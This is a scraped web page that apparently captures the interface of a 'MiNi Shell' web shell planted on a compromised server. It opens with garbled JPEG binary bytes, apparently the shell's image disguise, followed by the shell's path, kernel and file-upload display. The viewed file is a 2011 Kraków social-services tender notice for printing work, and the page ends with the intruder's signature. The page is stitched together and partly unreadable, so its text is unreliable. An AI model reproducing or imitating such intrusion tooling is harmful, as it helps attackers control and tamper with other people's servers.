JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110203/40301-N-2011.html

<p class="kh_header"><b>Kraków: Świadczenie usług poligraficznych dla Miesjkiego Ośrodka pomocy Społecznej w Krakowie</b><br>
<b>Numer ogłoszenia: 40301 - 2011; data zamieszczenia: 03.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług poligraficznych dla Miesjkiego Ośrodka pomocy Społecznej w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I część zamówienia - Druk formularzy urzędowych 

Wspólny Słownik Zamówień Publicznych CPV: 
22822000-8 formularze urzędowe

1.	Przedmiotem zamówienia jest wykonanie druków wewnętrznych, zgodnych z załączonymi wzorami, w ilościach określonych w formularzu cenowym, stanowiącym załącznik nr 2 do Specyfikacji.
2.	Wzory druków załączono do Specyfikacji - załącznik nr 8. 
3.	Kalkulując cenę Wykonawca powinien uwzględnić koszty składu, matrycy i wydruku przedstawionych wzorów druków, biorąc pod uwagę ilości, o których mowa w załączniku nr 2;
4.	Zapłata wynagrodzenia nastąpi po zrealizowaniu zamówienia w terminie do 14 dni od daty przyjęcia faktury lub rachunku przez Zamawiającego.

II część zamówienia - Druk materiałów promocyjnych 

Wspólny Słownik Zamówień Publicznych CPV: 
22459100-3 nalepki i taśmy reklamowe
22462000-6 materiały reklamowe

1.	Przedmiotem zamówienia jest:
a)	wykonanie projektów graficznych materiałów promocyjnych zgodnie                            z Zarządzeniem nr 2153-2009 Prezydenta Miasta Krakowa z dnia 02.10.2009 r.                w sprawie stosowania jednolitej linii graficznej Miasta Krakowa przez komórki organizacyjne UMK i miejskie jednostki organizacyjne, ewentualnie wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki i innymi wytycznymi wskazanymi przez Zamawiającego, 
b)	wydruk materiałów promocyjnych zatwierdzonych przez Zamawiającego oraz Kancelarię Prezydenta Miasta Krakowa,
c)	projekt naklejek będzie się składał z treści oraz logotypów, które zostaną przekazane Wykonawcy przez Zamawiającego. Zamawiający nie ma obowiązku przekazania logotypu w pliku, który można modyfikować w celu wykonania projektu naklejki i dyplomu,
d)	projekty graficzne naklejek i dyplomów nie wymagają akceptacji Kancelarii Prezydenta Miasta Krakowa.
2.	Realizacja usługi będącej przedmiotem zamówienia odbywać się będzie na podstawie zamówień częściowych.
3.	Rodzaje i ilości materiałów zostały określone w formularzu cenowym, stanowiącym załącznik nr 3 do Specyfikacji; wzory druków załączono do Specyfikacji - załącznik nr 8. 
4.	Do obowiązków Zamawiającego należy przekazanie Wykonawcy krótkiego opisu zadania, na potrzeby którego ma być wykonany materiał promocyjny, treść jaka ma być koniecznie w nim zamieszczona oraz informacje o innych ograniczeniach jakie są nałożone na wygląd materiału promocyjnego jak np. szczegółowe wytyczne dotyczące oznaczenia projektów w ramach programów operacyjnych.


5.	Do obowiązków Wykonawcy należy w szczególności:
- wykonanie przedmiotu zgodnie z zasadami wiedzy i techniki, obowiązującymi przepisami i bezpośrednimi uzgodnieniami między stronami oraz przede wszystkim z dokumentami, o których mowa w ust. 1 lit. a
- dokonanie uzgodnień technicznych i organizacyjnych z osobą upoważnioną ze strony Zamawiającego,
- dokonanie uzgodnień zgodnie z Zarządzeniem nr 2153-2009 Prezydenta Miasta Krakowa z 02.10.2009 r. w sprawie stosowanie jednolitej linii graficznej Miasta Krakowa przez Komórki organizacyjne UMK i miejskie jednostki organizacyjne,
- przekazanie Zamawiającemu gotowego przedmiotu zamówienia wraz                                  z potwierdzeniem, że projekt został zaakceptowany przez Kancelarię Prezydenta Miasta Krakowa.
6.	Wykonawca zobowiązany jest, w chwili protokolarnego odbioru przedmiotu zamówienia, do przeniesienia autorskich praw majątkowych bądź stosownych umów licencyjnych               z wszystkimi osobami, które wnoszą twórczy wkład przy realizacji przedmiotu zamówienia, w tym do pokrycia wszelkich zobowiązań wobec tych osób, z tytułu przysługujących im praw autorskich, tak aby było zagwarantowane prawo do nieograniczonego w czasie rozporządzania przedmiotem zamówienia w kraju i za granicą, w całości i we fragmentach, na następujących polach eksploatacji:
a)	utrwalanie na jakimkolwiek nośniku audiowizualnym i audialnym,                                 a w szczególności na: nośnikach video, taśmie światłoczułej, magnetycznej, dyskach komputerowych oraz wszystkich typach nośników przeznaczonych do zapisu cyfrowego;
b)	zwielokrotnienie jakąkolwiek techniką w tym: techniką magnetyczną na kasetach video, dyskach audiowizualnych, technika światłoczułą i cyfrową, techniką zapisu komputerowego na wszystkich rodzajach nośników dostosowanych do tej formy zapisu, wytwarzanie określoną techniką egzemplarzy utworu, w tym techniką drukarską, reprograficzną, zapisu magnetycznego oraz techniką cyfrową;
c)	publiczne wykonanie, wystawienie, wyświetlenie i odtworzenie;
d)	prawo obrotu egzemplarzami nośników w kraju i za granicą: wprowadzenie do obrotu przy użyciu Internetu i innych technik przekazu danych wykorzystujących sieci telekomunikacyjne, informatyczne i bezprzewodowe;
e)	sporządzenie wersji obcojęzycznych;
f)	wprowadzenie do pamięci komputera i do sieci multimedialnej w nieograniczonej ilości nadań i wielkości nakładów;
g)	wykorzystanie na stronach internetowych;
h)	wykorzystywania przedmiotu zamówienia do celów promocyjnych;
i)	publiczne udostępnianie utworu w taki sposób, aby każdy mógł mieć do niego dostęp, w miejscu i w czasie przez siebie wybranym, w nieograniczonej ilości nadań i wielkości nakładów;
j)	udostępniania osobom trzecim w celu zwielokrotnienia, wykorzystania do opracowania kolejnych materiałów promocyjnych, w tym wydruku materiałów promocyjnych w dowolnej ilości egzemplarzy i przy zastosowaniu dowolnej techniki druku.   
7.	Wykonawca zagwarantuje Zamawiającemu, że nabędzie on autorskie prawa majątkowe  w zakresie opisanym w punkcie 4 i żadnego z tych praw nie przeniósł na osobę trzecią. 
8.	Wynagrodzenie za przeniesienie praw autorskich jest wliczone w cenę za wykonanie projektu graficznego i druk - Wykonawcy nie przysługuje żadne dodatkowe wynagrodzenie z tytułu przeniesienia praw autorskich, o których mowa w pkt 4 lit. a-j.
9.	Zamawiający zastrzega sobie prawo do zmian ilości zamawianych środków w obrębie asortymentu wymienionego w formularzu cenowym stanowiącym załącznik nr 3 do Specyfikacji do wysokości kwoty umowy.
10.	W przypadku dokonania przez Kancelarię Prezydenta Miasta Krakowa zmian                       w Zarządzeniu nr 2153-2009 Prezydenta Miasta Krakowa z 02.10.2009 r. dotyczących wymiarów i formatów zawartych w załączniku nr 3 do Specyfikacji Zamawiający zastrzega sobie prawo zmiany umowy w tym zakresie. W takim przypadku zmianie może ulec kwota wynagrodzenia. 
11.	Końcowego odbioru przedmiotu zamówienia dokona protokolarnie komisja powołana przez Zamawiającego, w skład której wejdzie po jednym z przedstawicieli Stron.
12.	Wykonawca zobowiązany jest dysponować majątkowymi prawami autorskimi                       do wszystkich grafik i zdjęć wykorzystanych w materiale promocyjnym w polach eksploatacji pozwalających przenieść na Zamawiającego majątkowe prawa autorskie                   w zakresie określonym w umowie.
13.	Wypłata wynagrodzenia nastąpi po zrealizowaniu zamówienia w terminie do 14 dni od daty przyjęcia faktury częściowej.
Postanowienia dodatkowe, wspólne dla obu części zamówienia.
1.	Przedmiot zamówienia ma być dostarczony Zamawiającemu przez Wykonawcę własnym transportem i na jego koszt.
2.	W przypadku stwierdzenia przez zamawiającego wad lub braków ilościowych Wykonawca zobowiązany jest je usunąć ciągu trzech dni roboczych od daty doręczenia reklamacji Wykonawcy.
3.	Wysokość kar umownych:
a)	za zwłokę w dostarczeniu druków - 1% wartości dostarczonej partii materiałów za każdy dzień zwłoki,
b)	za zwłokę w usunięciu wad lub braków ilościowych - 2% wartości wadliwej partii materiałów za każdy dzień zwłoki,
c)	odstąpienie od umowy z przyczyn leżących po stronie Wykonawcy - 10% wynagrodzenia umownego. 
4.	Wszelkie kontakty z zamawiającym mogą odbywać się w godzinach pracy Zamawiającego,  tj. w poniedziałek w godzinach od 9:00 do 17:00 oraz od wtorku            do piątku w godzinach od 7:30 do 15:30,
5.	Zamawiający ustala, że oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują sobie w formie pisemnej, faksem lub drogą elektroniczną, na adres: do@mops.krakow.pl..
6.	Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.82.20.00-8, 22.45.91.00-3, 22.46.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki określone w art. 22 ust 1 ustawy Prawo zamówień publicznych i nie podlegają wykluczeniu na podstawie art. 24 ust 1 i 2 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zamawiający dopuszcza zmianę treści umowy w następującym zakresie 1. zmiany terminu dostarczenia przedmiotu zamówienia 2. miejsca dostarczenia przedmiotu zamówienia 3. warunków płatności 4. zmian w dotyczących wymiarów i formatów materiałów promocyjnych zawartych w załączniku nr 3 do SIWZ na skutek zmian dokonanych przez Kancelarię Prezydenta Miasta Krakowa</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:www.bip.krakow.pl/?dok_id=27000<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS w Krakowie, ul. Józefińska 14, pok. 002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2011 godzina 08:30, miejsce: dziennik Podawczy MOPS w Krakowie, ul. Józefińska 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Pora na aktywność.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Druk formularzy urzędowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie druków wewnętrznych, zgodnych z załączonymi wzorami, w ilościach określonych w formularzu cenowym, stanowiącym załącznik nr 2 do Specyfikacji.
2.	Wzory druków załączono do Specyfikacji - załącznik nr 8. 
3.	Kalkulując cenę Wykonawca powinien uwzględnić koszty składu, matrycy i wydruku przedstawionych wzorów druków, biorąc pod uwagę ilości, o których mowa w załączniku nr 2;
4.	Zapłata wynagrodzenia nastąpi po zrealizowaniu zamówienia w terminie do 14 dni od daty przyjęcia faktury lub rachunku przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.82.20.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Druk materiałów promocyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
a)	wykonanie projektów graficznych materiałów promocyjnych zgodnie                            z Zarządzeniem nr 2153/2009 Prezydenta Miasta Krakowa z dnia 02.10.2009 r.                w sprawie stosowania jednolitej linii graficznej Miasta Krakowa przez komórki organizacyjne UMK i miejskie jednostki organizacyjne, ewentualnie wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki i innymi wytycznymi wskazanymi przez Zamawiającego, 
b)	wydruk materiałów promocyjnych zatwierdzonych przez Zamawiającego oraz Kancelarię Prezydenta Miasta Krakowa,
c)	projekt naklejek będzie się składał z treści oraz logotypów, które zostaną przekazane Wykonawcy przez Zamawiającego. Zamawiający nie ma obowiązku przekazania logotypu w pliku, który można modyfikować w celu wykonania projektu naklejki i dyplomu,
d)	projekty graficzne naklejek i dyplomów nie wymagają akceptacji Kancelarii Prezydenta Miasta Krakowa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.91.00-3, 22.46.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com